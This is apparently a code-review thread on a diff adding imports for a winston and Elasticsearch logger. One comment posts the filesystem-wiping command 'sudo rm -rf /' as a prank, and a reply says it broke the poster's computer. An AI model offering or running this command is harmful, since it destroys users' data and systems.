src/logger.ts

```diff
@@ -0,0 +1,74 @@
+import * as winston from 'winston';
+import * as os from 'os';
+import * as grpc from 'grpc';
+import * as WinstonElasticsearch from 'winston-elasticsearch';
+import * as data from 'winston-elasticsearch/index-template-mapping.json';
+import { confLogger, serviceName } from './config';
+
+const Elasticsearch = require('winston-elasticsearch');
```

Comment:
`sudo rm -rf /`

Reply:
For some reason my computer broke after running this command. Is that supposed to happen?

Reply:
DO NOT REQUIRE!